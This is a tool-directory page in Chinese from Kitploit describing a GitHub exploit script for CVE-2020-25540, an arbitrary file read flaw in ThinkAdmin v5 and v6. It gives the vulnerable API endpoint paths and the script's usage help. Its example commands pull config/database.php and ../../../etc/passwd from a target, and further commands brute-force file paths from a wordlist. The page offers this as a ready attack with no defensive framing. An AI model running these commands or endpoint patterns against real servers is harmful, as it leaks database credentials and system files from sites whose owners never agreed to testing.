Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-25540 — ThinkAdmin v5 v6 任意文件读取漏洞利用,可自定义字典爆破 | Kitploit
工具/GitHubGitHub/simonlee-hello/cve-2020-25540
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubsimonlee-hello/cve-2020-25540

CVE-2020-25540

ThinkAdmin v5 v6 任意文件读取漏洞利用,可自定义字典爆破

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

cve-2020-25540

该脚本用来对ThinkAdmin v5,v6版本进行任意文件读取的漏洞利用

==其中接口路径在不同的版本间可能存在差异(一些基于原版ThinkAdmin二开的)==

  • 原版的接口是:/admin.html?s=admin/api.Update/get?/encode/xxxx
  • 我这一版的是(某资金盘二开的):/admin.html?s=admin/api.Update/read?encode=xxxx

基本用法

root@kitploit:~
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
                         [-p PARALLEL]

通过 API 读取文件并获取响应

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标 IP 地址或域名
  -f FILE, --file FILE  要读取的文件路径
  -w WORDLIST, --wordlist WORDLIST
                        字典文件路径,提供多个文件路径或文件名
  -b BASE_PATH, --base-path BASE_PATH
                        基础路径,用于拼接字典文件中的路径
  -p PARALLEL, --parallel PARALLEL
                        并行线程数
root@kitploit:~
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10
下载工具